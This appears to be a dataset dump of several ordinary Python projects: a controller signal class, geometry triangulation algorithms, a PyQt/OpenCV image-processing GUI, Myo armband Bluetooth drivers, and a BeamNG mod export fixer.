# Function that will send the controller state at the correct interval
def sending_function(self):
while self.recording_signal.is_set():
self.signal.axis_to_signal(self.roll, self.pitch, self.yaw, self.throttle)
sleep(self.send_delay)
def stop_inputs(self):
self.recording_signal.clear()
def recording(self):
return self.recording_signal.is_set()
def create_threads(self):
self.recording_Thread = Thread(target=self.recording_function, args=[])
self.recording_Thread.daemon = True
self.sending_Thread = Thread(target=self.sending_function, args=[])
self.sending_Thread.daemon = True
def get_ppm_data(self):
return self.signal.get_data()
def reset(self):
# Stop if running
if self.recording():
self.stop_inputs()
# Set inputs to default values
self.roll = 1.5
self.pitch = 1.5
self.yaw = 1.5
self.throttle = 1.5
# Reset signal
self.signal = PpmSignal()
``` |
{
"source": "jonpas/FERI-GeomCalc",
"score": 3
} |
#### File: jonpas/FERI-GeomCalc/common.py
```python
import numpy as np
# Compares 2 numbers for equality; designed for floats to overcome precision errors
def almost_equal(a, b):
return np.abs(a - b) < 0.000001
# Faster implementation of np.cross() for 2 vectors (3 points) returning magnitude directly
def area_triangle(a, b, c):
return area_rectangle(a, b, c, b) # d = b
# Faster implementation of np.cross() for 2 vectors (4 points) returning magnitude directly
def area_rectangle(a, b, c, d):
return (a[0] - b[0]) * (c[1] - d[1]) - (a[1] - b[1]) * (c[0] - d[0])
```
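A quick illustration of the helpers above, assuming `common.py` is on the import path; the points are arbitrary:
```python
# Illustrative only - arbitrary inputs.
from common import almost_equal, area_triangle

print(almost_equal(0.1 + 0.2, 0.3))            # True despite float rounding
signed = area_triangle((0, 0), (1, 0), (0, 1))
print(signed, abs(signed) / 2)                 # -1, 0.5 (half the magnitude is the triangle area)
```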
#### File: FERI-GeomCalc/modes/plane_triangulation.py
```python
import numpy as np
from modes import points_lines as pl
from modes import convex_hulls as ch
class PlaneTriangulation():
def __init__(self, parent):
self.parent = parent
self.algorithm = 0 # 0 - Minimum-Weight Triangulation, 1 - Hamiltonian Path
self.points = np.array([])
def set_algorithm(self, algorithm):
self.algorithm = algorithm
def set_points(self, points):
self.points = np.array(points, dtype=float)
def calculate(self):
if self.algorithm == 0:
return mwt(self.points), (np.array([]), np.array([]))
elif self.algorithm == 1:
return np.array([]), hamiltonian_path(self.points, main=self.parent)
def mwt(points):
if len(points) < 2:
return np.array([])
# Generate convex hull (for algorithm end check)
ch_points = len(ch.quickhull(points)) - 1 # -1 from final connection
# Generate all possible lines
lines = []
distances = []
for i, p1 in enumerate(points):
for p2 in points[i + 1:]:
lines.append([p1, p2])
distances.append(pl.euclidean_dist(p1, p2))
# Sort lines by distance (shortest to longest)
lines = np.array(lines)
distances = np.array(distances)
lines = lines[distances.argsort()]
# Shortest line is definitely part of triangulation
pt_lines = [lines[0]]
lines = lines[1:]
# Accept lines that don't intersect already accepted lines, reject others
# Repeat until enough lines are accepted (3 * points - 3 - convex hull points)
while len(pt_lines) < 3 * len(points) - 3 - ch_points:
line = lines[0]
intersection = False
for pt_line in pt_lines:
pi, itype = pl.intersection(line[0], line[1], pt_line[0], pt_line[1])
if itype == "intersection":
intersection = True
break
if not intersection:
pt_lines.append(line)
lines = lines[1:]
return np.array(pt_lines)
def hamiltonian_path(points, main=None):
# Generate convex hulls and spiral list
ch_points = []
s_points = []
while len(points) > 0:
# Generate convex hull (without last connecting point)
ch_p = ch.quickhull(points)[:-1]
# Find max Y and roll hull around to have max Y as first element
ch_max_i = np.lexsort((ch_p[:, 0], ch_p[:, 1]))[-1] # Max Y point's index
ch_p = np.roll(ch_p, -ch_max_i, axis=0)
# Assure first point in inner hull forms convex angle
if len(s_points) > 0 and len(ch_p) > 1:
# Roll until convex angle (one roll might not be enough)
angle = -1
while angle < 0:
a = s_points[-1] - ch_p[0] # Vector from last point of outer hull to first point in inner hull
b = ch_p[0] - ch_p[1] # Vector from first point to second point in inner hull
angle = np.arctan2(a[0] * b[1] - a[1] * b[0], a[0] * b[0] + a[1] * b[1]) # Angle between above vectors
# Roll by one so wanted point becomes first
if angle < 0:
ch_p = np.roll(ch_p, -1, axis=0)
# if main is not None:
# main.plot_point(ch_p[-1], text="O") # Debug
# main.plot_point(ch_p[0], text="R") # Debug
# Assure spiral doesn't intersect itself
if len(ch_points) > 0:
ch_last = ch_points[-1]
first, last, inner = ch_last[0], ch_last[-1], ch_p[0]
for i, p in enumerate(ch_p[:-1]):
pi, itype = pl.intersection(last, inner, p, ch_p[i + 1])
if itype == "intersection":
# Insert point high enough between first and last point of outer hull
offset_factor = (inner[1] - last[1]) / (first[1] - last[1])
x_offset = (last[0] - first[0]) * offset_factor
new_p = [last[0] - x_offset, inner[1]]
# Insert to outer hull (not part of inner hull!) and spiral
ch_points[-1] = np.vstack((ch_last, [new_p]))
s_points.append(np.array(new_p))
# if main is not None:
# main.plot_connection(first, last, color="blue") # Debug
# main.plot_point(last, color="red", text="I") # Debug
# main.plot_point(new_p, color="red", text="O") # Debug
break
# Add to forming spiral and hulls list
s_points.extend(ch_p)
ch_points.append(ch_p)
# Remove convex hull points from left-over points
points = np.array([p for p in points if p not in ch_p])
# Exit if not enough convex hulls for triangulation
if len(ch_points) < 2:
return np.array(s_points), np.array([])
# Generate generalized triangle strip
# Indexes of last point in first hull, first points in second and first hulls
a, b, c = len(ch_points[0]) - 1, len(ch_points[0]), 0
pt_points = [s_points[a], s_points[b], s_points[c]]
# Walk path until last 2 indexes are one apart
while b - 1 != c:
# Move to next triangle
a, b = b, c
c = a + 1
# Degenerate on final point
if c >= len(s_points):
c = a # Swap to valid index (degenerate)
pt_points.append(s_points[c])
continue
# Check if new line intersects spiral list or already created lines
line = [pt_points[-1], s_points[c]]
intersection = False
for i, p in enumerate(s_points[:-1]):
pi, itype = pl.intersection(line[0], line[1], p, s_points[i + 1])
if itype == "intersection":
intersection = True
break
if not intersection:
for i, p in enumerate(pt_points[:-1]):
pi, itype = pl.intersection(line[0], line[1], p, pt_points[i + 1])
if itype == "intersection":
intersection = True
break
# Degenerate on intersection
if intersection:
c = a # Swap to valid index (degenerate)
pt_points.append(s_points[c])
return np.array(s_points), np.array(pt_points)
``` |
{
"source": "jonpas/FERI-SigProc",
"score": 2
} |
#### File: jonpas/FERI-SigProc/imgproc.py
```python
import sys
import os
import numpy as np
import cv2
from scipy import signal
from scipy.ndimage import morphology
from skimage.exposure import rescale_intensity
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIntValidator
class MainWindow(QWidget):
def __init__(self):
super().__init__()
self.ax = None
self.orig_img = None
self.img = None
self.initUI()
def initUI(self):
spacer = QSpacerItem(50, 0, QSizePolicy.Minimum)
spacer_small = QSpacerItem(10, 0, QSizePolicy.Minimum)
# File selector
lbl_file = QLabel("File:")
self.txt_file = QLineEdit()
self.txt_file.setPlaceholderText("Select file ...")
btn_file = QPushButton("Select")
btn_file.clicked.connect(self.show_open_dialog)
# Save
self.btn_save = QPushButton("Save")
self.btn_save.clicked.connect(self.show_save_dialog)
# Reset
self.btn_reset = QPushButton("Reset")
self.btn_reset.setToolTip("Show originally loaded image (reset all modifications)")
self.btn_reset.clicked.connect(lambda: self.plot_image(self.orig_img))
# Histogram
self.btn_hist = QPushButton("Histogram")
self.btn_hist.setToolTip("Draw histogram of current image")
self.btn_hist.clicked.connect(self.histogram)
# Graph space
self.figure = Figure()
FigureCanvas(self.figure)
self.figure.canvas.setMinimumHeight(300)
# Conversion to Grayscale
self.cb_gray = QComboBox()
self.cb_gray.setToolTip("Grayscale conversion method")
self.cb_gray.addItems(["Average", "Red", "Green", "Blue"])
self.btn_gray = QPushButton("Grayscale")
self.btn_gray.setToolTip("Convert loaded image to grayscale image")
self.btn_gray.clicked.connect(lambda: self.grayscale(self.cb_gray.currentIndex() - 1))
# Segmentation / Binarization
self.segment_thresh = QLineEdit()
self.segment_thresh.setText("100")
self.segment_thresh.setToolTip("Segmentation threshold")
self.segment_thresh.setMaximumWidth(30)
self.segment_thresh.setValidator(QIntValidator(0, 255))
self.btn_segment = QPushButton("Binarize")
self.btn_segment.setToolTip("Convert loaded image to binary image using segmentation")
self.btn_segment.clicked.connect(lambda: self.binarize(int(self.segment_thresh.text())))
# Graph toolbar
self.plotnav = NavigationToolbar(self.figure.canvas, self.figure.canvas)
self.plotnav.setStyleSheet("QToolBar { border: 0px }")
self.plotnav.setOrientation(Qt.Vertical)
# Image processing implementation
self.cb_imgproc_impl = QComboBox()
self.cb_imgproc_impl.setToolTip("Processing implementation")
self.cb_imgproc_impl.addItems(["OpenCV", "SciPy", "Manual"])
# Smooth / Blur
self.smooth_intensity = QLineEdit()
self.smooth_intensity.setText("5")
self.smooth_intensity.setToolTip("Smooth intensity (must be at least 3 and odd)")
self.smooth_intensity.setMaximumWidth(30)
self.smooth_intensity.setValidator(QIntValidator(0, 255))
self.btn_smooth = QPushButton("Smooth")
self.btn_smooth.setToolTip("Smooth (blur) current image")
self.btn_smooth.clicked.connect(lambda: self.smooth(int(self.smooth_intensity.text())))
# Sharpen
self.sharpen_intensity = QLineEdit()
self.sharpen_intensity.setText("5")
self.sharpen_intensity.setToolTip("Sharpen intensity (must be at least 5)")
self.sharpen_intensity.setMaximumWidth(30)
self.sharpen_intensity.setValidator(QIntValidator(0, 255))
self.btn_sharpen = QPushButton("Sharpen")
self.btn_sharpen.setToolTip("Sharpen current image")
self.btn_sharpen.clicked.connect(lambda: self.sharpen(int(self.sharpen_intensity.text())))
# Edge detection
self.edge_intensity = QLineEdit()
self.edge_intensity.setText("4")
self.edge_intensity.setToolTip("Edge detection intensity (must be at least 4)")
self.edge_intensity.setMaximumWidth(30)
self.edge_intensity.setValidator(QIntValidator(0, 255))
self.btn_edge = QPushButton("Detect Edges")
self.btn_edge.setToolTip("Detect edges on current image")
self.btn_edge.clicked.connect(lambda: self.detect_edges(int(self.edge_intensity.text())))
# Dilate
self.dilate_intensity = QLineEdit()
self.dilate_intensity.setText("5")
self.dilate_intensity.setToolTip("Dilation intensity (must be at least 2)")
self.dilate_intensity.setMaximumWidth(30)
self.dilate_intensity.setValidator(QIntValidator(0, 255))
self.btn_dilate = QPushButton("Dilate")
self.btn_dilate.setToolTip("Dilate current image")
self.btn_dilate.clicked.connect(lambda: self.dilate(int(self.dilate_intensity.text())))
# Erode
self.erode_intensity = QLineEdit()
self.erode_intensity.setText("5")
self.erode_intensity.setToolTip("Erosion intensity (must be at least 2)")
self.erode_intensity.setMaximumWidth(30)
self.erode_intensity.setValidator(QIntValidator(0, 255))
self.btn_erode = QPushButton("Erode")
self.btn_erode.setToolTip("Erode current image")
self.btn_erode.clicked.connect(lambda: self.erode(int(self.erode_intensity.text())))
# Layout
hbox_top = QHBoxLayout()
hbox_top.addWidget(lbl_file)
hbox_top.addWidget(self.txt_file)
hbox_top.addWidget(btn_file)
hbox_top.addWidget(self.btn_save)
hbox_top.addWidget(self.btn_reset)
hbox_top.addStretch()
hbox_top.addSpacerItem(spacer)
hbox_top.addWidget(self.btn_hist)
hbox_top.addStretch()
hbox_top.addSpacerItem(spacer)
hbox_top.addWidget(self.cb_gray)
hbox_top.addWidget(self.btn_gray)
hbox_top.addSpacerItem(spacer_small)
hbox_top.addWidget(self.segment_thresh)
hbox_top.addWidget(self.btn_segment)
hbox_bot = QHBoxLayout()
hbox_bot.addWidget(self.cb_imgproc_impl)
hbox_bot.addStretch()
hbox_bot.addSpacerItem(spacer)
hbox_bot.addWidget(self.smooth_intensity)
hbox_bot.addWidget(self.btn_smooth)
hbox_bot.addWidget(self.sharpen_intensity)
hbox_bot.addWidget(self.btn_sharpen)
hbox_bot.addWidget(self.edge_intensity)
hbox_bot.addWidget(self.btn_edge)
hbox_bot.addStretch()
hbox_bot.addSpacerItem(spacer)
hbox_bot.addWidget(self.dilate_intensity)
hbox_bot.addWidget(self.btn_dilate)
hbox_bot.addWidget(self.erode_intensity)
hbox_bot.addWidget(self.btn_erode)
vbox = QVBoxLayout()
vbox.addLayout(hbox_top)
vbox.addWidget(self.figure.canvas)
vbox.addLayout(hbox_bot)
self.update_ui()
# Window
self.setLayout(vbox)
self.setGeometry(300, 300, 1000, 500)
self.setWindowTitle("Signal Processor - Image")
self.show()
# Overriden resize event
def resizeEvent(self, resizeEvent):
self.plotnav.move(self.width() - 55, 0)
def update_ui(self):
block_general = not self.is_image_loaded()
self.btn_save.setDisabled(block_general)
self.btn_reset.setDisabled(block_general)
self.btn_hist.setDisabled(block_general)
self.btn_gray.setDisabled(block_general)
self.btn_segment.setDisabled(block_general)
self.btn_smooth.setDisabled(block_general)
self.btn_sharpen.setDisabled(block_general)
self.btn_dilate.setDisabled(block_general)
self.btn_erode.setDisabled(block_general)
self.btn_edge.setDisabled(block_general)
def show_open_dialog(self):
fname, ext = QFileDialog.getOpenFileName(self, "Open file", filter="Image (*.png *.jpg *.bmp)")
if fname and self.load_image(fname):
self.txt_file.setText(fname)
def show_save_dialog(self):
fname, ext = QFileDialog.getSaveFileName(self, "Save file", filter="Image (*.png *.jpg *.bmp)")
if fname and self.is_image_loaded():
# Save as PNG if not set
if '.' not in fname:
fname += ".png"
cv2.imwrite(fname, cv2.cvtColor(self.img, cv2.COLOR_RGB2BGR))
self.txt_file.setText(fname)
def load_image(self, file):
if not os.path.isfile(file):
return False
# Read image and convert from BGR (OpenCV default) to RGB
self.orig_img = cv2.imread(file)
self.orig_img = cv2.cvtColor(self.orig_img, cv2.COLOR_BGR2RGB)
self.img = self.orig_img
self.plot_image(self.orig_img)
self.update_ui()
return True
def is_image_loaded(self):
return self.img is not None
def reset_plot(self):
self.figure.clear()
self.ax = self.figure.add_subplot(1, 1, 1)
def plot_image(self, img):
self.reset_plot()
self.ax.axis("off")
self.ax.imshow(img, cmap='gray' if len(img.shape) < 3 else None)
self.figure.canvas.draw()
self.img = img
# Draw histogram of current image
def histogram(self):
self.reset_plot()
self.ax.margins(0)
# Plot each channel on RGB image or only first channel on grayscale image
colors = ('r', 'g', 'b') if len(self.img.shape) > 2 else ('b',)
for i, color in enumerate(colors):
hist = cv2.calcHist([self.img], [i], None, [256], [0, 256])
self.ax.plot(hist, color=color)
self.figure.canvas.draw()
# Convert current image to grayscale
def grayscale(self, type=-1): # -1 - Average, 0 - Red, 1 - Green, 2 - Blue
# Do nothing if already grayscale
if len(self.img.shape) < 3:
return self.img
if type < 0:
# Convert to grayscale by averaging all channels
img_gray = cv2.cvtColor(self.img, cv2.COLOR_RGB2GRAY)
else:
# Convert to grayscale by taking one channel
img_gray = self.img[:, :, type]
self.plot_image(img_gray)
# Binarize current image
def binarize(self, threshold=0):
# Make sure we are operating on a grayscale image first
self.grayscale()
_, img_bin = cv2.threshold(self.img, threshold, 255, cv2.THRESH_BINARY_INV)
self.plot_image(img_bin)
# Get convolution implementation from combo box (lower-case text)
def get_imgproc_impl(self):
return self.cb_imgproc_impl.currentText().lower()
# Smooth (blur) current image
def smooth(self, intensity=5):
if intensity < 3 or intensity % 2 == 0:
print("Error! Smooth intensity should be at least 3 and an odd integer!")
kernel = np.ones((intensity, intensity)) / intensity**2
img_smooth = self.convolve2d(kernel)
self.plot_image(img_smooth)
# Sharpen current image
def sharpen(self, intensity=5):
if intensity < 5:
print("Warning! Sharpen intensity should be at least 5! Defaulting to 5!")
kernel = np.array((
[0, -1, 0],
[-1, max(intensity, 5), -1],
[0, -1, 0]))
img_sharp = self.convolve2d(kernel)
self.plot_image(img_sharp)
# Detect edges on current image
def detect_edges(self, intensity=5):
if intensity < 4:
print("Warning! Edge detection intensity should be at least 4! Defaulting to 4!")
kernel = np.array((
[0, 1, 0],
[1, -max(intensity, 4), 1],
[0, 1, 0]))
img_edges = self.convolve2d(kernel)
self.plot_image(img_edges)
# Dilate current image
def dilate(self, intensity=5):
if intensity < 2:
print("Warning! Dilation intensity should be at least 2! Defaulting to 2!")
intensity = 2
kernel = np.full((intensity, intensity), 255, dtype=np.uint8)
imgproc = self.get_imgproc_impl()
if imgproc == "opencv":
# OpenCV dilate
img_dilate = cv2.dilate(self.img, kernel)
elif imgproc == "scipy":
# SciPy grey_dilation
img_dilate = self.morph2d_scipy(self.img, kernel, morph_func=morphology.grey_dilation)
elif imgproc == "manual":
# Manual morphology
img_dilate = self.convolve2d_manual(
self.img, kernel,
func=lambda roi, kernel: np.max(roi[kernel.astype(bool)]))
else:
print("Error! Unknown image processing implementation!")
img_dilate = self.img
self.plot_image(img_dilate)
# Erode current image
def erode(self, intensity=5):
if intensity < 2:
print("Warning! Erosion intensity should be at least 2! Defaulting to 2!")
intensity = 2
kernel = np.full((intensity, intensity), 255, dtype=np.uint8)
imgproc = self.get_imgproc_impl()
if imgproc == "opencv":
img_erode = cv2.erode(self.img, kernel)
elif imgproc == "scipy":
img_erode = self.morph2d_scipy(self.img, kernel, morph_func=morphology.grey_erosion)
elif imgproc == "manual":
img_erode = self.convolve2d_manual(
self.img, kernel,
func=lambda roi, kernel: np.min(roi[kernel.astype(bool)]))
else:
print("Error! Unknown image processing implementation!")
img_erode = self.img
self.plot_image(img_erode)
# Convolve given image
def convolve2d(self, kernel):
imgproc = self.get_imgproc_impl()
if imgproc == "opencv":
return cv2.filter2D(self.img, -1, kernel)
elif imgproc == "scipy":
return self.convolve2d_scipy(self.img, kernel)
elif imgproc == "manual":
return self.convolve2d_manual(
self.img, kernel,
func=lambda roi, kernel: (roi * kernel).sum())
print("Error! Unknown image processing implementation!")
return self.img
# Convolve given image with SciPy
def convolve2d_scipy(self, img, kernel):
if len(img.shape) < 3:
# Grayscale
return signal.convolve2d(img, kernel, mode="same", boundary="symm")
else:
# Color - convolve each channel
img_conv = []
for ch in range(img.shape[2]):
img_conv_ch = signal.convolve2d(img[:, :, ch], kernel, mode="same", boundary="symm")
img_conv.append(img_conv_ch)
# Stack channels, clip to [0, 255] and cast back to the original image dtype (prevents invalid ranges)
return np.clip(np.stack(img_conv, axis=2), 0, 255).astype(img.dtype)
# Convolve given image with manual implementation and given pixel functor
def convolve2d_manual(self, img, kernel, func=None):
if func is None:
print("Error! Invalid convolution functor!")
return img
# Get spatial dimensions of the image and kernel
(img_h, img_w) = img.shape[:2]
(kern_h, kern_w) = kernel.shape[:2]
# Pad border
pad = int((kern_w - 1) / 2)
img = cv2.copyMakeBorder(img, pad, pad, pad, pad, cv2.BORDER_REPLICATE)
if len(img.shape) < 3:
# Grayscale
return self.convolve2d_manual_channel(img, kernel, (img_h, img_w), pad, func=func)
else:
# Color - convolve each channel
img_conv = []
for ch in range(img.shape[2]):
img_conv_ch = self.convolve2d_manual_channel(img[:, :, ch], kernel, (img_h, img_w), pad, func=func)
img_conv.append(img_conv_ch)
# Stack channels, clip to [0, 255] and cast back to the original image dtype (prevents invalid ranges)
return np.clip(np.stack(img_conv, axis=2), 0, 255).astype(img.dtype)
# Convolve one channel of given image with manual implementation
def convolve2d_manual_channel(self, img, kernel, img_size, pad, func):
(img_h, img_w) = img_size
# Slide the kernel over the image from left to right and top to bottom
img_conv = np.zeros((img_h, img_w))
for y in np.arange(pad, img_h + pad):
for x in np.arange(pad, img_w + pad):
# Extract region of interest (ROI) of the image by extracting the center region
roi = img[y - pad:y + pad + 1, x - pad:x + pad + 1]
# Perform convolution (element-wise multiplication between ROI and kernel and sum of matrix)
k = func(roi, kernel)
# Store convolved value in the current coordinate
img_conv[y - pad, x - pad] = k
# Rescale convolved image to be in range [0, 255]
return rescale_intensity(img_conv, in_range=(0, 255)) * 255
# Morph current image with SciPy
def morph2d_scipy(self, img, kernel, morph_func=None):
if morph_func is None:
print("Error! Invalid morphology functor!")
return img
# SciPy does not like non-zero kernels
kernel = np.zeros(kernel.shape)
if len(img.shape) < 3:
# Grayscale
return morph_func(img, structure=kernel)
else:
# Color - morph each channel
img_morph = []
for ch in range(img.shape[2]):
img_morph_ch = morph_func(img[:, :, ch], structure=kernel).astype(img.dtype)
img_morph.append(img_morph_ch)
# Stack channels, clip to [0, 255] and cast back to the original image dtype (prevents invalid ranges)
return np.clip(np.stack(img_morph, axis=2), 0, 255).astype(img.dtype)
if __name__ == "__main__":
# Create Qt application with window
app = QApplication(sys.argv)
main_win = MainWindow()
# Execute application (blocking)
app.exec_()
sys.exit(0)
``` |
{
"source": "jonpas/myo-raw",
"score": 2
} |
#### File: myo-raw/examples/minimal.py
```python
import argparse
import logging
from myo_raw import MyoRaw, DataCategory, EMGMode
def emg_handler(timestamp, emg, moving, characteristic_num):
print('emg:', timestamp, emg, moving, characteristic_num)
def imu_handler(timestamp, quat, acc, gyro):
print('imu:', timestamp, quat, acc, gyro)
def battery_handler(timestamp, battery_level):
print('battery level:', timestamp, battery_level)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('--tty', default=None, help='The Myo dongle device (autodetected if omitted)')
group.add_argument('--native', default=False, action='store_true', help='Use a native Bluetooth stack')
parser.add_argument('--mac', default=None, help='The Myo MAC address (arbitrarily detected if omitted)')
modes = ', '.join([str(item.value) + ': ' + item.name for item in EMGMode])
parser.add_argument('--emg_mode', type=int, default=EMGMode.RAW, choices=[m.value for m in EMGMode],
help='Choose the EMG receiving mode ({0} - default: %(default)s)'.format(modes))
parser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity')
args = parser.parse_args()
# set logging level to at least logging.INFO
logging.basicConfig(level=max(2 - args.verbose, 0) * 10)
# setup the BLED112 dongle or a native Bluetooth stack with bluepy and connect to a Myo armband
myo = MyoRaw(args.tty, args.native, args.mac)
# add handlers to process EMG, IMU and battery level data
myo.add_handler(DataCategory.EMG, emg_handler)
myo.add_handler(DataCategory.IMU, imu_handler)
myo.add_handler(DataCategory.BATTERY, battery_handler)
# subscribe to all data services
myo.subscribe(args.emg_mode)
# disable sleep to avoid disconnects while retrieving data
myo.set_sleep_mode(1)
# vibrate and change colors (green logo, blue bar) to signal a successful setup
myo.vibrate(1)
myo.set_leds([0, 255, 0], [0, 0, 255])
# run until terminated by the user
try:
while True:
myo.run(1)
except KeyboardInterrupt:
pass
finally:
myo.disconnect()
print('Disconnected')
```
#### File: myo-raw/myo_raw/bled112.py
```python
import struct
import threading
import time
import re
import logging
import serial
from serial.tools import list_ports
LOG = logging.getLogger(__name__)
class Packet():
'''BLED112 packet representation'''
def __init__(self, ords):
self.typ = ords[0]
self.cls = ords[2]
self.cmd = ords[3]
self.payload = bytes(ords[4:])
def __repr__(self):
return 'Packet(%02X, %02X, %02X, [%s])' % \
(self.typ, self.cls, self.cmd,
' '.join('%02X' % b for b in list(self.payload)))
class BLED112():
'''Non-Myo-specific Bluetooth backend using the provided BLED112 dongle with pyserial.'''
def __init__(self, tty):
if tty is None:
tty = self._detect_tty()
if tty is None:
raise ValueError('Bluegiga BLED112 dongle not found!')
self.conn = None
self.ser = serial.Serial(port=tty, baudrate=9600, dsrdtr=1)
self.buf = []
self.lock = threading.Lock()
self._internal_handler = None
self._external_handler = None
@staticmethod
def _detect_tty():
'''Try to find a Bluegiga BLED112 dongle'''
for port, desc, hwid in list_ports.comports():
if re.search(r'PID=2458:0*1', hwid):
LOG.debug('using "%s" at port %s', desc, port)
return port
return None
# internal data-handling methods
def recv_packet(self, timeout=None):
t0 = time.time()
self.ser.timeout = None
while timeout is None or time.time() < t0 + timeout:
if timeout is not None:
self.ser.timeout = t0 + timeout - time.time()
c = self.ser.read()
if not c:
return None
ret = self._proc_byte(ord(c))
if ret:
if ret.typ == 0x80:
self._handle_event(ret)
return ret
def _proc_byte(self, c):
if not self.buf:
if c in [0x00, 0x80, 0x08, 0x88]: # [BLE response pkt, BLE event pkt, wifi response pkt, wifi event pkt]
self.buf.append(c)
return None
elif len(self.buf) == 1:
self.buf.append(c)
self.packet_len = 4 + (self.buf[0] & 0x07) + self.buf[1]
return None
else:
self.buf.append(c)
if self.packet_len and len(self.buf) == self.packet_len:
p = Packet(self.buf)
self.buf = []
return p
return None
@property
def handler(self):
return self._external_handler
@handler.setter
def handler(self, func):
# wrap the provided handler function to be able to process BLED112 packets
def wrapped_handle_data(packet):
if (packet.cls, packet.cmd) != (4, 5):
return
_, attr, _ = struct.unpack('<BHB', packet.payload[:4])
pay = packet.payload[5:]
func(attr, pay)
self._external_handler = wrapped_handle_data if callable(func) else None
def _handle_event(self, p):
if self._internal_handler:
self._internal_handler(p)
if self._external_handler:
self._external_handler(p)
def _wait_event(self, cls, cmd):
res = [None]
def h(p):
if p.cls == cls and p.cmd == cmd:
res[0] = p
self._internal_handler = h
while res[0] is None:
self.recv_packet()
self._internal_handler = None
return res[0]
# specific BLE commands
def scan(self, target_uuid, target_address=None):
# stop scanning and terminate any previous connections 0, 1 and 2
self._send_command(6, 4)
for connection_number in range(3):
self._send_command(3, 0, struct.pack('<B', connection_number))
# start scanning
LOG.info('scanning for devices...')
self._send_command(6, 2, b'\x01')
while True:
packet = self.recv_packet()
if packet.payload.endswith(bytes.fromhex(target_uuid)):
address = list(list(packet.payload[2:8]))
address_string = ':'.join(format(item, '02x') for item in reversed(address))
LOG.debug('found a Bluetooth device (MAC address: %s)', address_string)
if target_address is None or target_address.lower() == address_string:
# stop scanning and return the found mac address
self._send_command(6, 4)
return address_string
def connect(self, target_address):
address = [int(item, 16) for item in reversed(target_address.split(':'))]
conn_pkt = self._send_command(6, 3, struct.pack('<6sBHHHH', bytes(address), 0, 6, 6, 64, 0))
self.conn = list(conn_pkt.payload)[-1]
self._wait_event(3, 0)
def disconnect(self):
if self.conn is not None:
return self._send_command(3, 0, struct.pack('<B', self.conn))
return None
def read_attr(self, attr):
if self.conn is not None:
self._send_command(4, 4, struct.pack('<BH', self.conn, attr))
ble_payload = self._wait_event(4, 5).payload
# strip off the 4 byte L2CAP header and the payload length byte of the ble payload field
return ble_payload[5:]
return None
def write_attr(self, attr, val, wait_response=True):
if self.conn is not None:
self._send_command(4, 5, struct.pack('<BHB', self.conn, attr, len(val)) + val)
if wait_response:
ble_payload = self._wait_event(4, 1).payload
# strip off the 4 byte L2CAP header and the payload length byte of the ble payload field
return ble_payload[5:]
return None
def _send_command(self, cls, cmd, payload=b''):
s = struct.pack('<4B', 0, len(payload), cls, cmd) + payload
self.ser.write(s)
while True:
p = self.recv_packet()
# no timeout, so p won't be None
if p.typ == 0:
return p
# not a response: must be an event
self._handle_event(p)
```
#### File: myo-raw/myo_raw/native.py
```python
import logging
from bluepy import btle
LOG = logging.getLogger(__name__)
class Delegate(btle.DefaultDelegate):
'''Store handlers to be called from a bluepy Peripheral on receiving notifications'''
def __init__(self):
super().__init__()
self.handler = None
def handleNotification(self, cHandle, data):
if self.handler:
self.handler(cHandle, data)
class Native(btle.Peripheral):
'''Non-Myo-specific Bluetooth backend based on a bluepy to use standard Bluetooth adapters.'''
def __init__(self):
super().__init__()
self.withDelegate(Delegate())
LOG.debug('using bluepy backend')
@staticmethod
def scan(target_uuid, target_address=None):
LOG.info('scanning for devices...')
scanner = btle.Scanner()
while True:
devices = scanner.scan(timeout=1)
for dev in devices:
uuid = next(item[2] for item in dev.getScanData() if item[0] == 6)
if target_uuid == uuid:
LOG.debug('found a Bluetooth device (MAC address: %s)', dev.addr)
if target_address is None or target_address.lower() == dev.addr:
return dev.addr
@property
def handler(self):
return self.delegate.handler
@handler.setter
def handler(self, func):
self.delegate.handler = func if callable(func) else None
def recv_packet(self, timeout=None):
self.waitForNotifications(timeout)
def read_attr(self, attr):
return self.readCharacteristic(attr)
def write_attr(self, attr, val, wait_response=True):
return self.writeCharacteristic(attr, val, withResponse=wait_response)
``` |
{
"source": "jonpecar/automationBeamNgExportFix",
"score": 2
} |
#### File: automationBeamNgExportFix/automationBeamNgExportFix/exportFix.py
```python
from io import BytesIO
import zipfile
from os import path
from typing import List
TARGET_LINES = [br'"cylinderWallTemperatureDamageThreshold"',
br'"damageThresholdTemperature"']
NEW_VALUE_STRING = b'99999999'
def get_target_file_path(zip_file_path : str):
dir, file_name = path.split(zip_file_path)
file_name_no_ext, ext = path.splitext(file_name)
return '/'.join(('vehicles', file_name_no_ext, 'camso_engine.jbeam'))  # Join manually (not with path.join()) because zip archive paths always use Unix separators
def update_line(line : bytes):
for target_line in TARGET_LINES:
if target_line in line:
start_pos = line.find(b':')
end_pos = line.find(b',')
new_line = line[:start_pos + 1] + NEW_VALUE_STRING + line[end_pos:]
return new_line
return line
def fix_file(zip_file_path : str):
target_file = get_target_file_path(zip_file_path)
output_object = BytesIO()
with zipfile.ZipFile(zip_file_path) as inzip, zipfile.ZipFile(output_object, 'w') as outzip:
for inzipinfo in inzip.infolist():
with inzip.open(inzipinfo) as infile:
if inzipinfo.filename == target_file:
in_content = infile.readlines()
for i in range(len(in_content)):
in_content[i] = update_line(in_content[i])
out_content = bytes()
for line in in_content:
out_content += line
outzip.writestr(inzipinfo, out_content)
else:
outzip.writestr(inzipinfo, infile.read())
with open(zip_file_path, 'wb') as f:
output_object.seek(0)
f.write(output_object.read())
```
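A small sketch of what `update_line` does to a matching jbeam line, assuming the package layout above makes it importable:
```python
# Illustrative only - the input line is a made-up jbeam snippet.
from automationBeamNgExportFix.exportFix import update_line

line = b'"damageThresholdTemperature": 150,'
print(update_line(line))  # b'"damageThresholdTemperature":99999999,'
```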
#### File: automationBeamNgExportFix/automationBeamNgExportFix/__main__.py
```python
from . import exportFix, get_files
import argparse
import os
def check_file(file):
if not os.access(file, os.W_OK):
parser.error('File could not be accessed. Make sure file exists and can be modified')
else:
return file
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Fix the turbo overheating bug in mods exported from Automation into BeamNG.drive. Operates either automatically on the most recent files in the BeamNG mods folder or on a specified file path')
parser.add_argument('-f', dest='filepath', help='Filepath to operate on', metavar='FILE', type=check_file)
